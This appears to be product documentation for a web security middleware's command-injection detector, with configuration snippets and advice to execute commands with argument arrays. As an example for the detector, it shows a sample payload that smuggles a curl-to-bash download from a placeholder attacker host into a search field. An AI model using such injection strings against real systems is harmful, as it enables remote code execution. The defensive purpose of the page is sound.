
Command Injection

Detects user input that is headed for a shell sink: exec, spawn, system, os.system, or backtick execution. Arcis matches shell metacharacters and known bypass sequences at the request boundary, before the value reaches application code.

What it catches

Sample payload

// Before (search query)
"reports.pdf; curl https://evil.com/x.sh | bash"

// After (sanitize mode)
"reports.pdf"

// In block mode: 403, vector=command, rule=patterns.command.shell-separator

Configuration

app.use(arcis({
  block: true,                                // reject a match with 403 instead of sanitizing it in place
  sanitize: { command: { enabled: true } }    // turn the command-injection detector on
}));

Disable or dry-run

// Per-route override: the command detector is off for this handler only; every other route keeps the global settings
app.post('/admin/run-script', arcis({ sanitize: { command: false } }), handler);

References

Defense-in-depth only. Never build a shell command string from user input. Make argument-array execution your primary defense: spawn(cmd, [args]) or execFile in Node (without shell: true; note that exec always goes through a shell), and subprocess.run([cmd, ...args], shell=False) in Python (shell=False is the default). Arguments passed that way go to the program directly and are never parsed by a shell, so ";", "|" and backticks are just characters in a filename. Arcis is the second line.